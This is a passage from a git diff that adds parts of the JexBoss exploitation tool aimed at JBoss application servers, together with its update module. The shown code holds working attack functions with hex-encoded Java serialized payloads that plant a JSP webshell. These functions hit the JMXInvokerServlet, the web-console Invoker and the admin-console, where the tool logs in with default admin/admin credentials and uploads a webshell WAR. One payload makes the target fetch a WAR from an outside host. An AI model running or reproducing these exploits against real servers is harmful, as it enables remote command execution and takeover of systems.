"\x6e\x6f\x74\x65\x3a\x20\x74\x68\x65\x72\x65\x20\x69\x73\x20\x61\x6e\x20\x75" + "\x70\x64\x61\x74\x65\x20\x74\x6f\x20\x4a\x65\x78\x42\x6f\x73\x73\x20\x4a\x53" + "\x50\x20\x57\x65\x62\x73\x68\x65\x6c\x6c\x2e\x20\x57\x65\x20\x72\x65\x63\x6f" + "\x6d\x6d\x65\x6e\x64\x20\x74\x68\x61\x74\x20\x79\x6f\x75\x20\x72\x65\x72\x75" + "\x6e\x20\x74\x68\x65\x20\x4a\x65\x78\x42\x6f\x73\x73\x20\x74\x6f\x20\x72\x65" + "\x64\x65\x70\x6c\x6f\x79\x20\x74\x68\x65\x20\x6e\x65\x77\x20\x76\x65\x72\x73" + "\x69\x6f\x6e\x20\x6f\x66\x20\x77\x65\x62\x73\x68\x65\x6c\x6c\x20\x69\x6e\x20" + "\x4a\x42\x6f\x73\x73\x20\x73\x65\x72\x76\x65\x72\x20\x74\x65\x73\x74\x65\x64" + "\x2e\x22\x29\x3b\x20\x7d\x20\x7d\x20\x65\x6c\x73\x65\x20\x69\x66\x20\x28\x73" + "\x68\x2e\x63\x6f\x6e\x74\x61\x69\x6e\x73\x28\x22\x69\x64\x22\x29\x20\x7c\x7c" + "\x20\x73\x68\x2e\x63\x6f\x6e\x74\x61\x69\x6e\x73\x28\x22\x69\x70\x63\x6f\x6e" + "\x66\x69\x67\x22\x29\x29\x20\x7b\x20\x63\x6f\x6e\x6e\x43\x68\x65\x63\x6b\x55" + "\x70\x64\x61\x74\x65\x73\x2e\x67\x65\x74\x49\x6e\x70\x75\x74\x53\x74\x72\x65" + "\x61\x6d\x28\x29\x3b\x20\x7d\x20\x7d\x20\x7d\x20\x63\x61\x74\x63\x68\x28\x45" + "\x78\x63\x65\x70\x74\x69\x6f\x6e\x20\x65\x29\x7b\x6f\x75\x74\x2e\x70\x72\x69" + "\x6e\x74\x6c\x6e\x28\x22\x45\x72\x72\x6f\x72\x20\x63\x68\x65\x63\x6b\x69\x6e" + "\x67\x20\x66\x6f\x72\x20\x75\x70\x64\x61\x74\x65\x73\x22\x29\x3b\x7d\x20\x74" + "\x72\x79\x20\x7b\x20\x50\x72\x6f\x63\x65\x73\x73\x20\x70\x3b\x20\x69\x66\x20" + "\x28\x53\x79\x73\x74\x65\x6d\x2e\x67\x65\x74\x50\x72\x6f\x70\x65\x72\x74\x79" + "\x28\x22\x6f\x73\x2e\x6e\x61\x6d\x65\x22\x29\x2e\x74\x6f\x4c\x6f\x77\x65\x72" + "\x43\x61\x73\x65\x28\x29\x2e\x69\x6e\x64\x65\x78\x4f\x66\x28\x22\x77\x69\x6e" + "\x22\x29\x20\x3e\x20\x30\x20\x7c\x7c\x20\x21\x53\x79\x73\x74\x65\x6d\x2e\x67" + "\x65\x74\x50\x72\x6f\x70\x65\x72\x74\x79\x28\x22\x66\x69\x6c\x65\x2e\x73\x65" + "\x70\x61\x72\x61\x74\x6f\x72\x22\x29\x2e\x65\x71\x75\x61\x6c\x73\x28\x22\x2f" + "\x22\x29\x29\x7b\x20\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67\x65" + "\x74\x52\x75\x6e\x74\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63\x28\x22\x63\x6d" + "\x64\x2e\x65\x78\x65\x20\x2f\x43\x20\x22\x2b\x73\x68\x29\x3b\x20\x7d\x20\x65" + "\x6c\x73\x65\x20\x7b\x20\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67" + "\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63\x28\x73\x68" + "\x29\x3b\x20\x7d\x20\x62\x72\x20\x3d\x20\x6e\x65\x77\x20\x42\x75\x66\x66\x65" + "\x72\x65\x64\x52\x65\x61\x64\x65\x72\x28\x6e\x65\x77\x20\x49\x6e\x70\x75\x74" + "\x53\x74\x72\x65\x61\x6d\x52\x65\x61\x64\x65\x72\x28\x70\x2e\x67\x65\x74\x49" + "\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x29\x29\x3b\x20\x53\x74\x72" + "\x69\x6e\x67\x20\x64\x69\x73\x72\x20\x3d\x20\x62\x72\x2e\x72\x65\x61\x64\x4c" + "\x69\x6e\x65\x28\x29\x3b\x20\x77\x68\x69\x6c\x65\x20\x28\x64\x69\x73\x72\x20" + "\x21\x3d\x20\x6e\x75\x6c\x6c\x29\x20\x7b\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e" + "\x74\x6c\x6e\x28\x64\x69\x73\x72\x29\x3b\x20\x64\x69\x73\x72\x20\x3d\x20\x62" + "\x72\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x7d\x20\x7d\x63\x61" + "\x74\x77\xbc\x63\x68\x28\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x20\x65\x29\x20" + "\x7b\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28\x22\x55\x6e\x6b\x6e" + "\x6f\x77\x6e\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x2e\x22\x29\x3b\x20\x7d\x20\x7d" + "\x20\x25\x3e\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x42\x6f" + "\x6f\x6c\x65\x61\x6e\xcd\x20\x72\x80\xd5\x9c\xfa\xee\x02\x00\x01\x5a\x00\x05" + "\x76\x61\x6c\x75\x65\x78\x70\x01\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e" + "\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b" + "\x47\x02\x00\x00\x78\x70\x00\x00\x00\x05\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c" + "\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x71\x00\x7e\x00\x0f\x71\x00\x7e\x00" + "\x0f\x71\x00\x7e\x00\x0f\x74\x00\x07\x62\x6f\x6f\x6c\x65\x61\x6e\x21\x96\x59" + "\xec\x78\x77\x08\x00\x00\x00\x00\x00\x00\x00\x01\x73\x72\x00\x22\x6f\x72\x67" + "\x2e\x6a\x62\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x49" + "\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x4b\x65\x79\xb8\xfb\x72\x84\xd7\x93\x85" + "\xf9\x02\x00\x01\x49\x00\x07\x6f\x72\x64\x69\x6e\x61\x6c\x78\x70\x00\x00\x00" + "\x04\x70\x78") + + headers = {"Content-Type": "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue", + "Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2", + "Connection": "keep-alive", + "User-Agent": user_agents[randint(0, len(user_agents) - 1)]} + + r = pool.urlopen('POST', url + "/invoker/JMXInvokerServlet", redirect=False, headers=headers, body=payload) + result = r.status + + if result == 401: + print(" Retrying...") + pool.urlopen('HEAD', url + "/invoker/JMXInvokerServlet", redirect=False, headers=headers, body=payload) + return get_successfully(url, "/jexinv3/jexinv3.jsp") + + +def exploit_web_console_invoker(url): + """ + Exploits web console invoker + Does not work in JBoss 5 (bug in JBoss5) + :param url: The URL to exploit + :return: The HTTP status code + """ + payload = ( + "\xac\xed\x00\x05\x73\x72\x00\x2e\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e" + "\x63\x6f\x6e\x73\x6f\x6c\x65\x2e\x72\x65\x6d\x6f\x74\x65\x2e\x52\x65\x6d\x6f" + "\x74\x65\x4d\x42\x65\x61\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\xe0\x4f" + "\xa3\x7a\x74\xae\x8d\xfa\x02\x00\x04\x4c\x00\x0a\x61\x63\x74\x69\x6f\x6e\x4e" + "\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74" + "\x72\x69\x6e\x67\x3b\x5b\x00\x06\x70\x61\x72\x61\x6d\x73\x74\x00\x13\x5b\x4c" + "\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x5b\x00" + "\x09\x73\x69\x67\x6e\x61\x74\x75\x72\x65\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61" + "\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x10\x74\x61\x72" + "\x67\x65\x74\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x74\x00\x1d\x4c\x6a\x61" + "\x76\x61\x78\x2f\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2f\x4f\x62\x6a\x65" + "\x63\x74\x4e\x61\x6d\x65\x3b\x78\x70\x74\x00\x06\x64\x65\x70\x6c\x6f\x79\x75" + "\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65" + "\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00" + "\x01\x73\x72\x00\x0c\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x55\x52\x4c\x96\x25" + "\x37\x36\x1a\xfc\xe4\x72\x03\x00\x07\x49\x00\x08\x68\x61\x73\x68\x43\x6f\x64" + "\x65\x49\x00\x04\x70\x6f\x72\x74\x4c\x00\x09\x61\x75\x74\x68\x6f\x72\x69\x74" + "\x79\x71\x00\x7e\x00\x01\x4c\x00\x04\x66\x69\x6c\x65\x71\x00\x7e\x00\x01\x4c" + "\x00\x04\x68\x6f\x73\x74\x71\x00\x7e\x00\x01\x4c\x00\x08\x70\x72\x6f\x74\x6f" + "\x63\x6f\x6c\x71\x00\x7e\x00\x01\x4c\x00\x03\x72\x65\x66\x71\x00\x7e\x00\x01" + "\x78\x70\xff\xff\xff\xff\xff\xff\xff\xff\x74\x00\x0e\x6a\x6f\x61\x6f\x6d\x61" + "\x74\x6f\x73\x66\x2e\x63\x6f\x6d\x74\x00\x0f\x2f\x72\x6e\x70\x2f\x6a\x65\x78" + "\x77\x73\x33\x2e\x77\x61\x72\x71\x00\x7e\x00\x0b\x74\x00\x04\x68\x74\x74\x70" + "\x70\x78\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53" + "\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70" + "\x00\x00\x00\x01\x74\x00\x0c\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x55\x52\x4c" + "\x73\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e" + "\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f\x03\xa7\x1b\xeb\x6d\x15" + "\xcf\x03\x00\x00\x78\x70\x74\x00\x21\x6a\x62\x6f\x73\x73\x2e\x73\x79\x73\x74" + "\x65\x6d\x3a\x73\x65\x72\x76\x69\x63\x65\x3d\x4d\x61\x69\x6e\x44\x65\x70\x6c" + "\x6f\x79\x65\x72\x78") + + headers = { + "Content-Type": "application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation", + "Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2", + "Connection": "keep-alive", + "User-Agent": user_agents[randint(0, len(user_agents) - 1)]} + r = pool.urlopen('POST', url + "/web-console/Invoker", redirect=False, headers=headers, body=payload) + result = r.status + if result == 401: + print(" Retrying...") + pool.urlopen('HEAD', url + "/web-console/Invoker", redirect=False, headers=headers, body=payload) + return get_successfully(url, "/jexws3/jexws3.jsp") + + +def get_viewstat_admin_console(page): + page = str(page).replace("\\n", "\n") + for i in page.split('\n'): + if 'javax.faces.ViewState' in i: + if i.count('value') ==1: + return i.split("value=\"")[1].split("\"")[0] + else: + return i.split("value=\"")[2].split("\"")[0] + + +def get_boundary_admin_console(jboss_version, state, payload): + + boundary = "-----------------------------8994251555011888521050172030\r\n" + if jboss_version == 6: + data = boundary + data += "Content-Disposition: form-data; name=\"createContentForm\"\r\n" + data += "\r\n" + data += "createContentForm\r\n" + data += boundary + data += "Content-Disposition: form-data; name=\"createContentForm:file\"; filename=\"jexws3.war\"\r\n" + data += "Content-Type: application/octet-stream\r\n" + data += "\r\n" + data += payload + "\r\n" + data += boundary + data += "Content-Disposition: form-data; name=\"createContentForm:rhq_prop-0_328868266\"\r\n" + data += "\r\n" + data += "false\r\n" + data += boundary + data += "Content-Disposition: form-data; name=\"createContentForm:rhq_prop-0_-1257012452\"\r\n" + data += "\r\n" + data += "false\r\n" + data += boundary + data += "Content-Disposition: form-data; name=\"createContentForm:addButton\"\r\n" + data += "\r\n" + data += "Continue\r\n" + data += boundary + data += "Content-Disposition: form-data; name=\"javax.faces.ViewState\"\r\n" + data += "\r\n" + data += state + "\r\n" + data += "-----------------------------8994251555011888521050172030--\r\n" + return data + elif jboss_version == 5: + data = boundary + data += "Content-Disposition: form-data; name=\"createContentForm\"\r\n" + data += "\r\n" + data += "createContentForm\r\n" + data += boundary + data += "Content-Disposition: form-data; name=\"createContentForm:file\"; filename=\"jexws3.war\"\r\n" + data += "Content-Type: application/octet-stream\r\n" + data += "\r\n" + data += payload + "\r\n" + data += boundary + data += "Content-Disposition: form-data; name=\"createContentForm:rhq_prop-1995377939_328868266\"\r\n" + data += "\r\n" + data += "false\r\n" + data += boundary + data += "Content-Disposition: form-data; name=\"createContentForm:addButton\"\r\n" + data += "\r\n" + data += "Continue\r\n" + data += boundary + data += "Content-Disposition: form-data; name=\"javax.faces.ViewState\"\r\n" + data += "\r\n" + data += state + "\r\n" + data += "-----------------------------8994251555011888521050172030--\r\n" + return data + + +def url_encode(text): + if version_info[0] >= 3: + return quote(text) + else: + return urllib.quote_plus(text) + + +def exploit_admin_console(url): + """ + Exploits admin-console + tested and works in JBoss 5 and 6 + :param url: The URL to exploit + :return: The HTTP status code + """ + # Use default password for Jboss 5 and 6 + username = "admin" + password = "admin" + headers = { + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Connection": "keep-alive", + "User-Agent": user_agents[randint(0, len(user_agents) - 1)]} + + r = pool.request('GET', url+"/admin-console/login.seam", headers=headers) + cookie = r.getheader('set-cookie').split(";")[0] + headers['Cookie'] = cookie + state = get_viewstat_admin_console(r.data) + #payload = ("login_form=login_form&login_form:name=%s&login_form:password=%s&login_form:submit=Login" + # "&javax.faces.ViewState=%s" % (username, password, state)) + payload = "login_form=login_form&login_form%3Aname="+username+"&login_form%3Apassword="+password+"&login_form%3Asubmit=Login&javax.faces.ViewState="+url_encode(state) + headers['Content-Type'] = "application/x-www-form-urlencoded" + print(GREEN + "\n * Info: Trying to perform authentication with default credentials..." +ENDC) + r = pool.request('POST', url+"/admin-console/login.seam", body=payload, headers=headers, redirect=False) + state = get_viewstat_admin_console(r.data) + if r.status == 302: + print(GREEN + " * Info: Successfully logged in! Wait..." + ENDC) + location = r.getheader('Location') + conversation_id = location.split('=')[1] + r = pool.request('GET', location, headers=headers) + if state == None: + sleep(7) + r = pool.request('GET', url+"/admin-console/secure/summary.seam?path=-3%2FApplications%2FWeb+Application+%28WAR" + "%29&conversationId="+conversation_id+"&conversationPropagation=end", headers=headers) + conversation_id = str(int(conversation_id)+1) + r = pool.request('GET', url+"/admin-console/secure/resourceTypeSummary.seam?actionMethod=secure%2FresourceType" + "Summary.xhtml%3AcreateContentBackedResourceAction.init%28%29&conversationId=" + + conversation_id, headers=headers) + state = get_viewstat_admin_console(r.data) + + headers['Content-Type'] = "multipart/form-data; boundary=---------------------------8994251555011888521050172030" + + payload = ("\x50\x4b\x03\x04\x14\x00\x08\x08\x08\x00\x6d\x7c\x98\x48\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x04\x00\x4d\x45\x54\x41\x2d\x49\x4e" + "\x46\x2f\xfe\xca\x00\x00\x03\x00\x50\x4b\x07\x08\x00\x00\x00\x00\x02\x00\x00" + "\x00\x00\x00\x00\x00\x50\x4b\x03\x04\x14\x00\x08\x08\x08\x00\x6d\x7c\x98\x48" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x4d\x45\x54" + "\x41\x2d\x49\x4e\x46\x2f\x4d\x41\x4e\x49\x46\x45\x53\x54\x2e\x4d\x46\xf3\x4d" + "\xcc\xcb\x4c\x4b\x2d\x2e\xd1\x0d\x4b\x2d\x2a\xce\xcc\xcf\xb3\x52\x30\xd4\x33" + "\xe0\xe5\x72\x2e\x4a\x4d\x2c\x49\x4d\xd1\x75\xaa\x04\x09\x58\xe8\x19\xc4\x9b" + "\x9b\x2b\x68\xf8\x17\x25\x26\xe7\xa4\x2a\x38\xe7\x17\x15\xe4\x17\x25\x96\x00" + "\x95\x6b\xf2\x72\xf1\x72\x01\x00\x50\x4b\x07\x08\x05\xa0\x0e\xbc\x43\x00\x00" + "\x00\x44\x00\x00\x00\x50\x4b\x03\x04\x14\x00\x08\x08\x08\x00\x68\x7c\x98\x48" + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x6a\x65\x78" + "\x77\x73\x33\x2e\x6a\x73\x70\x95\x55\x5f\x6f\x1a\x39\x10\x7f\xbf\x4f\x31\xb1" + "\x94\xca\x94\xb2\xb4\xba\x97\x53\x08\xd1\xa5\xb9\x54\x69\x14\xe9\x22\x52\xae" + "\x0f\xa7\xaa\x32\xbb\x03\xeb\x74\xd7\xf6\xd9\xb3\x05\x94\xf2\xdd\x6f\xec\x05" + "\x02\x85\x6b\x75\x2f\xbb\xc6\x33\x9e\x9d\xf9\xfd\x31\xe7\xa7\xbf\x83\x53\x33" + "\x04\x5d\x3b\xeb\x69\x28\x1e\xd5\x57\x95\x35\xa4\xab\xec\xe5\xab\xb4\xd6\x96" + "\x57\x90\x96\x06\x29\x7b\x29\x52\xfe\xb5\xc9\x6d\xa1\xcd\x6c\x28\xc6\x1f\xde" + "\xf5\x7e\x13\xa7\x17\x70\xee\x3c\xf2\xf3\x14\xb4\x21\xf8\x8a\x3e\x68\x6b\x60" + "\x08\xbf\x0e\x40\x4f\x41\x7a\xfc\xa7\xc1\x40\xd9\x0c\xe9\x5e\x79\x55\x23\xa1" + "\x97\xc2\x39\x27\x3a\x70\x32\x04\xd3\x54\x55\x07\x9e\x60\x62\x6d\x85\xca\x40" + "\x5e\x62\xfe\x65\xec\x0a\x45\x18\x06\x70\x43\xe4\xc6\xa3\xbb\x2b\x6b\x0c\xe6" + "\x14\xeb\xe6\xbc\xbc\xda\xc9\x81\xb6\xc4\x00\xde\x36\xd3\x29\x7a\x2c\x46\xa8" + "\x0a\xf4\x30\xf1\xdb\x88\xc7\xe0\xac\x09\x98\x05\x24\xae\x44\x68\xe8\xc3\xd2" + "\xa1\x14\x84\x0b\xea\x97\x54\x57\xa2\x73\xd0\xeb\x4d\x2a\x23\x45\xea\xa7\xd7" + "\xb4\x1f\x7b\x6e\x19\x5e\xbc\x80\x9f\x67\x67\x9c\xa1\xaa\x20\xc5\x94\x9f\x28" + "\x3a\x9d\xa7\xbd\xf9\xb8\xc3\x14\x18\xc0\x0a\xf9\x05\x07\x51\xf2\x0d\x07\x8f" + "\x8c\x2c\x0f\x80\xe9\x80\xc1\x39\xf0\x96\x14\x25\xc7\xce\xfa\xfd\x39\x4e\x42" + "\x89\x55\x95\x3d\xe2\x62\x62\x43\x88\x2c\xf6\x1f\x83\xfb\xbc\xa6\x28\xa3\x05" + "\x71\x8b\xd6\xa1\x79\x2e\x23\x19\x89\x15\x3c\x90\x67\x8a\x21\x94\xfc\xa9\x1f" + "\xf0\x37\xd8\x24\x56\x2a\xd0\x8d\x6d\x7c\xea\x32\xb6\x17\x7b\xf9\x83\x7b\x95" + "\x9d\x8c\x6c\x9b\xc4\xcb\xe0\x2a\x4d\x52\x9c\x89\xce\xdf\xaf\x3f\x75\x45\x99" + "\x55\x76\xc6\x1d\x78\x74\x95\xca\xf1\xb2\xaa\xa4\x00\xf1\x0a\x44\x2f\x96\x26" + "\xbf\x7c\x4a\xa4\xec\x63\xd2\x82\x12\x81\xfc\x0e\x95\xc8\xee\xa8\xed\xf5\xde" + "\xf3\x50\x9e\x96\x52\x8c\x03\xfa\xde\xe5\x8c\x19\xe7\xba\x47\xf8\xba\xb1\x81" + "\x31\xe8\x8a\xf3\x9e\xe8\xee\x84\x47\x58\x5b\xc2\xcb\xa2\xf0\xb2\xb3\x96\xc6" + "\x49\x1c\xe9\x9d\xae\x70\x4d\xf2\x67\xd1\xdd\x9b\x9a\xb9\x5e\xe8\x40\x41\x46" + "\x92\xef\x79\x60\xfa\xe8\x35\x43\x05\xf3\xf6\x35\x4c\xfc\xec\x04\xfe\xab\xce" + "\x60\x7d\x22\xcb\x2b\x1b\x30\xf2\x31\xd9\x9c\xde\x97\x78\x02\xf9\xbd\x71\x0d" + "\x31\xc0\xa8\xea\xf5\xee\x01\x2e\x3c\xcf\x4e\x16\xf7\x17\x27\x62\xa7\xc6\xcf" + "\xfe\xb5\x75\xeb\x7b\xf6\xc5\x8c\xbf\xea\x94\x0f\xc8\x3f\xe4\xc4\x33\x31\xaa" + "\xb8\xd3\x06\x9f\xa9\x03\xa6\xee\xcd\xa7\x35\x24\xbb\x05\x2e\x36\xc6\xe7\xe9" + "\x6d\x43\x99\x8b\x83\x4a\x71\xcf\x9e\x66\x61\x1b\x46\xf3\x0c\xa8\xe4\xe6\x41" + "\x07\x60\x9b\xb7\x16\x01\xb2\x70\x8b\x8b\xb7\xac\x4e\xb8\x7d\xb8\x87\x8f\x1b" + "\xc9\xf2\x8a\xe9\xca\x6d\x5d\xa3\x29\xf8\xa0\x22\x58\xda\x86\xb7\x7c\x63\x62" + "\x9d\xed\x29\x2e\xc0\x80\xb0\x80\xec\x32\xed\x47\x4c\x36\x57\x90\x9d\xc2\xc6" + "\x03\x3c\x30\xdc\xa6\x03\x2c\x08\x8e\x03\x03\x43\x58\x64\x22\xc9\x7d\x05\xc9" + "\x7e\x71\xa6\x50\x66\x0c\x20\x29\x6d\xd8\xb5\xba\x60\xc3\x7f\xfb\x06\xfb\x9b" + "\x8e\xd7\x53\xcd\xc2\x8d\xd7\xd6\x4f\xd1\x6e\xeb\xaf\x20\x57\x94\x97\xf2\x7a" + "\x91\xa3\x4b\xf7\x18\x4b\x78\x8b\x53\x65\xa4\xb8\xf6\xde\xfa\xd6\xff\xd1\x51" + "\x53\xfe\xb1\xbd\x46\x06\xab\xe8\x06\x88\xba\xb2\x39\xf2\x10\xae\x25\xe0\x61" + "\xc9\x43\xd4\xc9\x99\x5b\xc5\x5b\xf6\x39\x9b\x54\x44\xe3\xdd\xd9\x39\xfa\x2b" + "\x15\x55\x94\x69\x53\xe0\xe2\xcf\xa9\x14\x73\x6d\x78\xaa\x0b\x78\x1d\x27\x3b" + "\x39\x56\x62\xca\x2a\x67\x37\xb1\x12\x14\x59\xbf\x73\x8b\xf5\xd3\x0d\xe6\x58" + "\x2d\xa3\xc6\x90\xae\x31\x79\xa5\x5d\xca\x68\x00\xcc\x59\xd5\x75\x11\x57\xd0" + "\xbf\x02\xd1\x0d\x65\x02\x60\x7d\xbb\xfd\xf8\xe4\x3a\xf7\xff\xa9\xdd\x1d\x95" + "\xf7\xfa\x5a\x2a\x74\x88\xc5\xf6\x94\xcc\xf6\x2a\x79\x3e\x90\x29\xb8\xf3\x07" + "\xb4\xcb\x46\x8c\x71\xe6\xf1\xf3\xcc\xe6\x21\x99\xdf\x15\x10\x63\xf3\xc5\xd8" + "\x79\xfc\xbb\xaa\x6b\x65\x9e\x85\x76\x7a\xf1\xcb\xbf\x50\x4b\x07\x08\x25\x39" + "\x60\x50\x70\x03\x00\x00\x7a\x07\x00\x00\x50\x4b\x01\x02\x14\x00\x14\x00\x08" + "\x08\x08\x00\x6d\x7c\x98\x48\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00" + "\x09\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4d" + "\x45\x54\x41\x2d\x49\x4e\x46\x2f\xfe\xca\x00\x00\x50\x4b\x01\x02\x14\x00\x14" + "\x00\x08\x08\x08\x00\x6d\x7c\x98\x48\x05\xa0\x0e\xbc\x43\x00\x00\x00\x44\x00" + "\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3d\x00\x00" + "\x00\x4d\x45\x54\x41\x2d\x49\x4e\x46\x2f\x4d\x41\x4e\x49\x46\x45\x53\x54\x2e" + "\x4d\x46\x50\x4b\x01\x02\x14\x00\x14\x00\x08\x08\x08\x00\x68\x7c\x98\x48\x25" + "\x39\x60\x50\x70\x03\x00\x00\x7a\x07\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\xc2\x00\x00\x00\x6a\x65\x78\x77\x73\x33\x2e\x6a\x73" + "\x70\x50\x4b\x05\x06\x00\x00\x00\x00\x03\x00\x03\x00\xb5\x00\x00\x00\x6a\x04" + "\x00\x00\x00\x00") + + data = get_boundary_admin_console(jboss_version=6, state=state, payload=payload) + try: + r = pool.request('POST', url + "/admin-console/secure/resourceContentCreate.seam", headers=headers,body=data) + if r.status != 302: + data = get_boundary_admin_console(jboss_version=5, state=state, payload=payload) + r = pool.request('POST', url + "/admin-console/secure/resourceContentCreate.seam", headers=headers, body=data) + except: + sleep(1) + + return get_successfully(url, "/jexws3/jexws3.jsp") + + else: + print(RED + "\n * Authentication failed!" + ENDC) + return 404 diff --git a/Jboss_Verify_EXploitation/_updates.py b/Jboss_Verify_EXploitation/_updates.py new file mode 100644 index 0000000..5d2e6b4 --- /dev/null +++ b/Jboss_Verify_EXploitation/_updates.py @@ -0,0 +1,137 @@ +# -*- coding: utf-8 -*- +""" +Module for managing updates to the JexBoss +https://github.com/joaomatosf/jexboss + +Copyright 2013 João Filho Matos Figueiredo + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. +You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. +""" + +RED = '\x1b[91m' +RED1 = '\033[31m' +BLUE = '\033[94m' +GREEN = '\033[32m' +BOLD = '\033[1m' +NORMAL = '\033[0m' +ENDC = '\033[0m' + +from jexboss import __version +from sys import version_info +import os +import shutil +from zipfile import ZipFile +try: + from urllib3 import disable_warnings, PoolManager + from urllib3.util.timeout import Timeout + disable_warnings() +except ImportError: + print(RED1 + BOLD + "\n * Package urllib3 not installed. Please install the dependencies before continue.\n" + "" + GREEN + " Example: \n" + " # pip install -r requires.txt\n" + ENDC) + exit(0) + +timeout = Timeout(connect=3.0, read=6.0) +pool = PoolManager(timeout=timeout, cert_reqs='CERT_NONE') + + + + +def auto_update(): + """ + Download and deploy the latest version + :return: True if successfully updated + """ + url = 'https://github.com/joaomatosf/jexboss/archive/master.zip' + + # backup of prior version + if os.path.exists('old_version'): + shutil.rmtree('old_version') + shutil.copytree(".", "." + os.path.sep + "old_version") + + # download and extract of new version + print(GREEN + " * Downloading the new version from %s." %url +ENDC ) + r = pool.request('GET', url) + if r.status != 200: + print(RED + " * Error: Could not complete the download of the new version. Check your internet connection." + ENDC) + return False + with open('master.zip', 'wb') as f: + f.write(r.data) + z = ZipFile('master.zip', 'r') + print(GREEN + " * Extracting new version..." +ENDC) + z.extractall(path='.') + z.close() + os.remove('master.zip') + path_new_version = '.' + os.path.sep + 'jexboss-master' + print(GREEN + " * Replacing the current version with the new version..." + ENDC) + for root, dirs, files in os.walk(path_new_version): + for file in files: + old_path = root.replace(path_new_version, '.') + os.path.sep + old_file = root.replace(path_new_version, '.') + os.path.sep + file + new_file = os.path.join(root, file) + + if not os.path.exists(old_path): + os.makedirs(old_path) + + shutil.move(new_file, old_file) + # remove extracted directory of the new version + shutil.rmtree('.'+os.path.sep+'jexboss-master') + + return True + + +def check_updates(): + """ + Checks if there is new version available + :return: boolean if there updates + """ + url = 'http://joaomatosf.com/rnp/releases.txt' + print(BLUE + " * Checking for updates in: %s **\n" % url + ENDC) + header = {"User-Agent": "Checking for updates"} + r = pool.request('GET', url, redirect=False, headers=header) + + if r.status != 200: + print(RED + " * Error: could not check for updates ...\n" + ENDC) + return False + else: + current_version = __version + link = 'https://github.com/joaomatosf/jexboss/archive/master.zip' + date_last_version = '' + notes = [] + # search for new versions + resp = str(r.data).replace('\\n','\n') + for line in resp.split('\n'): + if "#" in line: + continue + if 'last_version' in line: + last_version = line.split()[1] + elif 'date:' in line: + date_last_version = line.split()[1] + elif 'link:' in line: + link = line + elif '* ' in line: + notes.append(line) + elif 'version:' in line and 'last_' not in line: + break + # compare last_version with current version + tup = lambda x: [int(y) for y in (x + '.0.0.0').split('.')][:3] + if tup(last_version) > tup(current_version): + print ( + GREEN + BOLD + " * NEW VERSION AVAILABLE: JexBoss v%s (%s)\n" % (last_version, date_last_version) + ENDC + + GREEN + " * Link: %s\n" % link + + GREEN + " * Release notes:") + for note in notes: + print (" %s" % note) + return True + else: + return False \ No newline at end of file diff --git a/Jboss_Verify_EXploitation/demo.png 